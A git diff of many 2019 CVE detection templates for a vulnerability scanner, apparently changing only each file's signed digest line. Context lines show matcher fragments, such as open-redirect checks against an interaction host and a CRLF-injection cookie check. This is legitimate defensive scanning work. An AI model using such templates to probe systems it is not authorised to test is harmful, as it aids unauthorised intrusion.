a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 61246eac75..6c47ab0beb 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087e07b13ffd8498b944c3ab62ea3696863c12c5c12305c58743e84b7a864c625022100a1f953ea855d068bce6e0aaea6c360596e97406348dd81c909ae1bbeed0bef1b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022039be24072102bdf3b08461f6c214f258bd1be0d36b6a3a405953e16a45da5825022045bdb6badac9f2808506a829308cac8da1e18937956561b1b9889bff221f06bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 7f07598298..c26c059339 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -42,5 +42,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and - -# digest: 4a0a00473045022100d73e79efab16fb46d2c7e4ea8576d55c794c13880d495c5593d617a802ab32a8022044d53acd654574ce61dc5fae7edb34b8f7436e62477788345abf0cd70c39df16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220387dbf3301c5c83fd5554952e2b7b42d17e30be767d655aed9130df7b533e95502210087904b1cf1a677fe11e45e588461c381119068f84817e1fcc8ad74cb96d83bc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 9a93ba7d1a..11bb80ecb4 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202d9f9e2e16f651a4cd9b7a6295bc933721846187b889e2f21c96df39cfc28b00022059096589aa99c9542018eb8f9f41c32a5f69dfe26aae29c406bf867203a53298:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008e6498c4174483ceb51673a183385e1fa7fedcff00037aef3cde086326836656022070df87d61b97d302bdbd06e83200b4a487fedff80bf81bde98d43bdeb493920a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 9520ec66a8..49a716af15 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202bd676ddc466c5fb0899d42645ede9da21cbccabfa95585fb08a043b95135f8c02210083f6ba9cd18222a0e8f3ab6b84b25b4cbc81dfbe9baa3e176688e79602c551a8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d147923c13e7213d00f66d3b9394b5c7276b67c1be929dcdb4bf875b93889858022100b8c8f4e28594320a26918da9e36cb4da55a983fe38af4efcd2f3205d8b6b34d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 130e993dba..be2a713000 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 302 - -# digest: 4a0a0047304502205a07b995d95cc9924eb1dc84f861d6af1216cecf4175c8fa461d0a08ff6f1e61022100ef2d00009dcb28cbfc4bbe01d0961c94469dda76e717b24a0a5f48ed7369a64f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201f767679bda1dbcfb7d01a23c7fb08a2a3af0cb3a53a11bb9447e61a68e741c7022100b07c293021d0c1c6f26b970fe97ef31a6354ed1116a8abebc75e194300915e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 886c683427..4b4e13c363 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fc435bde95fc424299f28aea7048cebaeac0f5b57453705a030aedc3c2f83cc90220459b68e67d132c796a8f0bf23998d1994b6e4580af8114cdc7560e3f6f19e41a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220434ffb84a9d483a6adbacc47da12a80c417a7a5b1e24db9e9e5f7c79867aefc6022100b5bdf84c087e7194365a4ee45b659bc16b72eec4bd29ba5c120bda7f7655e1ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index f28fda6aa3..cefd171a92 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210090cd6d6bd7c6558bef4fcd2c31b2c3018bd71bd59e239c54de9ea54a0bd9a575022100bd378350a22032f92cba9dad987f217d42f349ef41ee9de64bda101adf0c74ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c714d812e8847364209d94a5041a0da86d5aa7eebd15465ad3f22521253bff4002202e717fdce5980cd4b6cf654d5512c944be869c0444c735e838681c1765c6b76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index ab8701aad2..8e05ac613c 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205b94668563215b7fa4b7b78a141cca158f2bb1b950ebe3c7b2bbca9294852054022100cdb7f0c2a584212a18c0db4e5eb01191a7a3dd3ae15373c986140ff2cf20bf8f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a26a26ad402434639ef14c0d953b8794665b8292b4a849de6793b106b53253c8022070ac731d3fe4053400a1d56e623faaf26f60eb763848cf26b18d2daaa2ae3ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 97ef3b8d45..0e0c4986e2 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -44,5 +44,4 @@ http: part: header words: - "text/html" - -# digest: 4a0a00473045022049305520aa3cb4df2ee04232af8ed9b5886dbae992f6643613951ccab78b461802210097c01a084e05a7bb6ad4ba8cd394fad1ee5e6e29347698ec37924041798a7a51:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f856ffc4dd9f48c2ac7aac6443c169a32f06bc2dd83fef4607e743ad13bf1e1c022100a6e0185183b94d5508c5e45c64403d38c5d9d044a8c8daf6a152cb7624475a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index b4e77f3dbb..76e9677155 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -61,5 +61,4 @@ http: - '(?:[a-zA-Z0-9+\/])*_poc.php' internal: true part: body - -# digest: 490a004630440220154dc8a4ea05afd4fd0437a3ea70007a218eb03f6a5cb96938e2abdc3970b815022073c20f5c8b2a9ffebda4132a32cd94f1739f3f88a71285b9a5ef15ae7ee7d5aa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e7ad2e6e068c3b28d81a85fb538d83201b8dae457cda24cfee1fb1b647e9539d02204f2fd63cf72a7ff02e0d7b79ad821ee127c6e5f140c75e5e5afd4f6c98f8b587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 5d8f1a93bb..a1763bfccf 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f34b029a00df7088734856be584adba86ec0a5347d69606331dd4aba4bccb39902207d30c784f7f42e391b6957fa430618c3cfa61f96bbecfb0bd925d1d38bed6396:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a647c2c9028f79480cb7891d5589282e27491fee32bc457b2f41fe8f8a9680f80220219b53aa19057b2d155114d77f6bdc4f099cb834ff8e9e34ef06b8b19a44c17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 4fd169ea4a..ac34807e65 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205e9ef4dfd7702b2ba413e4a061e7ef3f203c54f217b114cb245d49f468e2468802206f09f5b319d8a39cabca5f68db95d56d511f212aa221cd51b38312e6ffeef2bb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207def903181624344c5761a58c19dab3ea6bf6eff56c435d4864e457a6e4e1e4d022100f90d874b4115b6d51e775e6ddc9090a5c801a6b1974618c1241f7605b56f4273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 682668af69..43ff91a183 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d4c4c32670d5c3de877821e9f54b6378cc843c889c98154c53d0e4d5d62e7c46022100810987c93634dc2e99f6af1d7f960fc059efa9a38166b6ac7d6b81da7a2b4b84:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e295b757a4ee0aa7d3dd352c662479d1ec2139550beedaff62273d35d737202022100aebd6e64e49ff43fd84d43be9acbc8d2f08617937783479426cba85f387fc7d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index 5fa4674da6..f9ae30b5c7 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -40,5 +40,4 @@ http: part: body regex: - '' - -# digest: 4b0a00483046022100aa8d36081c4d2b9ffa6bf75304deda6320d8a6b0cbb8d59daa2300d6c1739f1702210099b0f7fe3e9e1eb771966893763cfc4d53e7ed31041b90dfa69d69a8bda06760:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ff434cc7b658e49a4ab359f058db1d6bb829be5ca4abbe16b45759eba44a0c17022062deb79b36d280aae4b98f2cd7e9b3d1af6b31e621d21096c0dcb2b83d1564fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index 48f4a1dd50..67ecd38ee5 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -59,5 +59,4 @@ http: - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>" internal: true part: body - -# digest: 4b0a00483046022100b1dd1dac4a0d620d623cb85178a9f50c07431b93b1cc922f4ca693c8a77fc4f9022100bce9fa9d86067c4c8ff3366e11a7057ba4e7460d44d104c515315be05b2ab9d7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202b1ee5f04a72602a351ab9e777caa5013bf869ef5fff63603f78a88d1367a082022059ce8c9fc2f817d3ce84a7d2216435168504453c3c621ba5cab0e39c6fa88f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index d8dda2aba8..35a952e98b 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a03035d171932ff72d4383b5bce93a6a04233483193de01751ba6f682cdfdadb022100b38b285dd762c721adef8086a845f92f9e4adc9b606a8549581fc5c4ce014877:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204b51470ff31e52cb4988faf331098cb57ba3b121c9659f32cd93819e204f15ea022100a8e108a1b3101ac14e6e1c2e0d8a2f40ddef9e18ef1419cb1ee334913f4c2bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index d3504f8dff..6dcb709e20 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -64,5 +64,4 @@ http: - 'status_code_2 == 202' - 'contains(body_3, "Vulnerable")' condition: and - -# digest: 4a0a0047304502206e9a574c355109dfd58a2c1c752ba1d2a74bfd4b37a35d9bc287ef4416418ffc0221008126e9c384fbd1e106e1979c0f3eca90752b7f90cf66f5b7fdb82d4c735aec6d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206951eadbe97ad21118d7003f18fc21d54452a40e0d0b5ac8b0b7f0d0b14ff2ac02210099543b31c3f195257a6c30e5e3fbcfdf88da41ad9e1f89e9c02be1c883693910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 450239535d..c119c927a2 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -43,4 +43,4 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a00473045022100872be4f3518de820d8664afea468645d232234bdc6f17a82d05cc097559d134402205bd0ddadd21aecf238586ba87c2db62b3e361ee4f61d2d43e726dee658bd4974:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bcb899ddbb67c0b41a9f78657313c1fd90299f43fc35b82fc9f01ff7bd938c35022100cc6c3a59af53214ae3b1c92b5ec5453f322aaec7567973f9996b21ec3e95cc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index f44af7905d..86397c1526 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022068d9b784ff0550f7d94871526fab1114a42b2f205db5002db1cc34cae6d561d2022039120f012de3773c597833660efa830e8c4e04c884031ce69ed314d0469c1779:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201766de141fd6004912ae2acfd79f49cfd77b9f84423835894e61f655b8143dc402202f0194d3b10183cefe128c5656dcbdc4cb75c35ee13c49b9e6ea3df80cae219e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index e7d47ae2a0..f1942a7202 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008500869ed6ee3c9b96eba725afa92d2cc568f461b143083a5c949f5a79e7756f022076433c204273eaebe185557be294d006e4f7769619706a0b7ffb3b11afc49f23:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e5d2236b3499761655f7280ac2f12bfadc73e856711ef9864bded573c259e586022043d4e84a6586805f37f34a90507b57bc166ad720019384cef6142f0571890e83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 747cbf9d8d..7bbf21def9 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c7a92ac87853cbdec59017b18dea694e2858f879fa3d2b360ab0b06396c4ad410220180662ad79a409a638bf91c31899c2b704cfbabe1d8bd29f2eb67f66ecad5012:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f9c24e0aeaca74d05bc7586fb2c1d984397cc3b95c5a18c18ee62b7026e47ca2022100a84a56f034baf38f98e5dda6c08734ce7eed45a74d29513c104af22d9d2f4a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index dfc2d1872b..eb0946db16 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a8fa45bce214f1575cfa14c07ff43e43cedb1b029eb55527e8eb387314fd67fe022021bae83795346c92bdde1736c45a6fb19db0fc25561a17f8ccf438b7ba78f43c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100956ac2ee112ab802bac5a9b66543652ba9d415082e512b4d9613a713a37b5111022100846c5a7d303d666954aa129054e5af3611107cdd1dfcbbb1f6d1a78f25d086d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 835e5306da..a39db908f5 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a004630440220428a6b6f1f06f52c7dc30425c635f16a6e1677ffa8d2ca82cbf7ef7db0574d3902207ebc5f8a6cba4484856db50ea43cb6ebfdd2b8ce67783acce8506a86ad5ae1ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205db6d1a87e5d135f28ca70f347574911d4b7eaaa07e0b36065d12b99b5709e530221009b1e5464b39f6a58396c44d93d33d2e8690647d5b15ee5b2399e049d2ba5a4bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index c56994ce66..5dfeb800e0 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -43,5 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 490a004630440220389ca415534a33165b49f129f90c1ef86f8baf7394698c224140626a1fe3dbc902207ab3b9bf404a23634f65b0240f5b80cb95cf437c1fd9fe16d665ed109e293eb7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c0427f7aa6bf8e2144e61549b31293d8f856a350dc0ad14bdc6de9aee650e41e022100be2fb98db02accef210b234fae98b64f98b249592e1e60469a57ac00b078694f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index a4ac10e354..18ebf38b6f 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220168c84f087eef96ed49c986388d384a9bc5855d868ebdcfe955d15607b314f5902201a15c39feb93eedb9c29a3e1b47975e38d2cc8046656d0cc44887304acc0b127:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022059391254fc3f4c7d44cac8683ebaa15e9a01f711410040952955e3d97bf8998f022100f6ca6eedb28c6abac1083b8721b521740fa02bbff5b47d206e7ce254d5fc5975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 68375860b5..40d56614c8 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c336efdb1e240dc7f79c465b42ae4c3048de697beb39ef108dea6eb459d06bcd022062153f8c7de5a348a81b0e14a8e9b8eaf52fa21602ab65f4b01b6873c25347d1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201aeb2653c00d5c3e6de5b782001430d9bf2643548e5d0cb6f589f31c8eb7818a022100f0bb3a7a83be65629335a40349ef7fac3e7413454b3504a72e031be0b6f07121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 6cbc1cb2bd..6297373bbc 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d27159be1fe5b5fead8a22bde64cb6f85f86a6749ed5598365b2fc3d9b25947a022035e47bd9f6cb2bd5b6ce885d87e60fccd12511cacec24a4d09327dd534e358c2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6b43329b11cde1e7dd16706a317d04d6d94bc722ca2f4b586183d2b65879626022100bbc0618ca666b7564a14f8de12ac16c0f67c41f59b677d02d697837d128d2a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index b642fbdb2e..e7ca384cfa 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -40,5 +40,4 @@ http: part: body words: - TmVzc3VzQ29kZUV4ZWNUZXN0 - -# digest: 490a0046304402207fb81b0bf8a7ec2b9297694ec8a33d439ce93357ff28f9ee152a4ebea0851336022008d1448d8f881295608bdccc79ef6bf8bb9a1d7e3e0fc5a68354a91c2a72d052:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008e990d94bfb9dfb69b2039ca7d1fb17ce720016cb8213112fc2d202d4d813cc1022100f910ac44225e0f5ce4b1541f51ee01492167e1d94b428f35dd4c7475a0b6d43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index e63ebc0390..13e3ba8034 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -101,5 +101,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header - -# digest: 4b0a00483046022100a0cc23b145f331dde747a1be7f5b9a81fe50f2b45396debcfc3c982fd00d8be8022100e78d0ad198a1c43bf75c88269384d0e255317b9507bb055fe0b30405305b0c56:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210080b475b84262093bc5085e346057eda3f901f2cc99d57e96b3d4f6834a8d19fa022100a6dabb0f09205434475f66e01d9e71909b5a45fdccee0c57adb2d6b690732134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 8ee93d5eee..f25d807802 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -38,5 +38,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" - -# digest: 4b0a00483046022100a9f03b2d3337cfdec6f1180292a0ec45753d4ae8c5556810fbbb63ca50303282022100ad2e89436c777d5addd7a1d77683926808b73d797ed9af002411aa70c5429e25:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201a485df685429e8bdd8661230597a638960193884e320e36b5495ee5da61a664022010e3f69b4961b29a9c1d383f9eecdbc9b7f5b8c42b7b1581ee30610914813692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 6bdcc26aa0..0ebd1143aa 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -84,5 +84,4 @@ http: regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true - -# digest: 490a00463044022075ad87156673ac7093c79d6295b61533c05d25a850fc6b35e1e5eec922932a9102204d3191ed7fb64415d640414f2a40d530beea451f3d0e86e7f14a1233de23eb35:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220792ae006ea1b4811a3194c14a999090bdcbd522ea61b84aa5065ee3d797da8550221008595f6e3073481d7ac9dc5f18fc645d3674a830d4bcaa598fee04d13a538ef1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 819c918941..707b8bbcac 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fc3e28c69ce4050f1d841d6876decdf477ae5b9d053132ef756a45a7db417727022100d7819dd8cb2d4d685ed40df5fd403188e75efff175223b0c5924f842e19e6e73:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201b48d102be1c361eef736ca1ee5547a4d5ead8fb550b7b99c3723b5f0bd87c0f02200863448ec967e2148c09adb2bb6eb09a1a517cf8a29db4d956387927d97dc319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 807d19f1c8..8be46d2a5c 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e571291c3ff9c53537558d715b30f8d2fde105ef9f417dd43dc5a53300b0efa5022004f395fd0d3bc83ed36723c5d2b6a11a4e5678113c4ac90c9dc198dec456dc74:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200c76966fc16bc9f18f756c704b1367f01de7fdc579a44cdf0bc0a368bdc9bd7502210093bdfe8814496f0bc06c5b822c6c9a5218dae1357d61f68f9f1a50affb39e428:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 4a7741a270..2cd43219e2 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ad931e77d6b8cc2854a0cdbe7fa1f6f9695d181fb8e302d96c3cb8657a1c724602203f8d6c29a0abda2476b45c027a0800135797198b1764467031b1ffd9b5de46f3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018b45de52a855aa1590b1f16d62c03d6b58bf9ef05dc37b77442ca39331596070220312c32ec8a60613f4483f3ab91e20a4582b46e0fb7f0f819dc34606aa5751b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index d7500ca428..e4de4bdfbd 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c241082eec09ab2a0e94d09dac936eefd0391a44d9169afe772992e6cec7364f022025a75ca20967cb54529a82072d0268d962856dc6bc9e262773a71a7f019ef701:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b4331026373254d45f0403d1dcefdb51550e0ad15aef5b5e38c69a235f58cbcf02204ce00729a25579b008ff96db4077ef1c9b29ee76fd875a1309bcfd6181634a27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 2fd1f5d862..f00f134493 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a00463044022048fab62cc0b44c2fae0672a72f0cab35898c2d8517b8f9ca0a2e18b821ab565702206f792e2cc588439f75c4df83dbbae0f3f56b3041816ca9145378e1f36df37130:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008ed8cd0294285d53bdc0a94902ebf44ba2bb6cd9dcbeecec7335f6038aab85fb022100f1d51a1f1a15976fd39482bf4bb8ff1081f55230f0e0817e98b3ffd0a141fee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index da9b86b8e5..82ce307be1 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 